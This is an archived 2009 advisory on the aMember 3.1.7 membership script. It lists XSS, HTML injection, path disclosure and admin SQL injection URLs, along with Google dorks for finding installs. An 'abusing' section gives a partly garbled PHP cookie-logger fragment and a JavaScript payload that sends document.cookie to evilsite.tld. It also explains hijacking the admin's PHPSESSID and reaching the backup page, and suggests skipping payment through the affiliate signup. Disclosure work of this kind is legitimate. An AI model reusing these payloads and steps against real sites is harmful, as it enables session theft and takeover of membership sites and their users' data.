AOH :: HP Unsorted A :: BT-21003.HTM

AMember 3.1.7 - Multiple Vulnerabilities



AMember 3.1.7 - Multiple Vulnerabilities
AMember 3.1.7 - Multiple Vulnerabilities



AMember - Multiple Vulnerabilities

Version Affected: 3.1.7 (Apr-10-2009) (newest)

Info: aMember is a flexible membership and subscription management PHP script. It has support for
PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling,
Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and
allows you to setup paid-membership areas on your site. It can also be used without any payment
system - you can manage users manually.

aMember Pro also supports integration plugins to link users database with third-party scripts,
for example vBulletin, Joomla, WordPress (see list of integration plugins).
aMember is a perfect membership software for selling digital subscriptions and downloads.

Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS.

Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)

Accurate Googled0rk: (fewer results)
http://lmgtfy.com/?q=inurl:/amember intext:=A9 CGI-Central.NET, 2002-2006 

Inaccurate Googled0rk: (more results)
http://lmgtfy.com/?q=intext:=A9 CGI-Central.NET, 2002-2006 

External Links:
http://www.amember.com/ 
http://www.amember.com/p/Main/Download 
http://www.amember.com/p/Main/Demo 


-:: The Advisory ::-

Version Information:
http://www.website.tld/amember/docs/changelog.txt 

Information Disclosure:
http://www.website.tld/amember/docs/tester.php 
http://www.website.tld/amember/setup.php?step=' 
http://www.website.tld/amember/admin/report.php?report=' (admin only) 
- More files are affected. (discloses full path to the file)

Cross Site Scripting (admin only - might not survive a login screen!)
 
 
 
http://www.website.tld/amember/admin/users.php?action= 
http://www.website.tld/amember/admin/setup.php?notebook= 
 
 
http://www.website.tld/amember/admin/products.php?action= 
http://www.website.tld/amember/admin/protect.php?action= 
http://www.website.tld/amember/admin/coupons.php?action= 
 
 
http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl= 
http://www.website.tld/amember/aff.php?action= (this might only affect attacker) 
- More files might be affected.

HTML Injection: (insert: "> into the mentioned forms)
http://www.website.tld/amember/signup.php (first- and last-name) 
http://www.website.tld/amember/aff_signup.php (first- and last-name) 
http://www.website.tld/amember/profile.php (first- and last-name) 

HTML Injection Exception: (this injection might only be possible to be seen by the attacker)
http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too) 

Affeced Sites (by HTML Injection):
http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive) 
http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string 
http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection) 
http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID 
http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID 
http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID 
http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME 
-- More files might be affected.

SQL Injection: (requires admin access)
http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC 
http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales 
http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL' 
-- More files might be affected, the depth of SQL Injection was not checked!


 -:: Solution ::-
All the files are encrypted according to CGI Systems' website.

 Questions and answers (quote)

I've downloaded aMember, but the source code is corrupted. How can I download it again ?
The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology

Which essentially mean i was unable to find any solution to the problem.
I believe this vulnerability might be exploited in the wild due to it is very
easy to find and take advantage of. (if you know what you're looking for)

Addition: The most easy solution would be to use a regular expression to fix this issue.


 -:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

Firstname: ">    
- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm 

CookieLogger:
");
    else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();
header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf"); 
?>

When you have gotten a hash from the admin of the victim site you can issue:
Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)

What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php 

What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)

2) The file should contain the following:
HTML Code:

document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie; 

3) Sign up and make you first name: (try aff_signup.php to avoid paying!)
"> http://forum.intern0t.net/exploits-vulnerabilities-pocs/1018-intern0t-amember-3-1-7-multiple-vulnerabilities.html 

Disclosure Information:
- Vulnerabilities found early start of May 2009.
- Advisory finished and published 14th May on InterN0T.
- Bugtraq (SecurityFocus) and Milw0rm contacted the 24th May.


All of the best,
MaXe

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.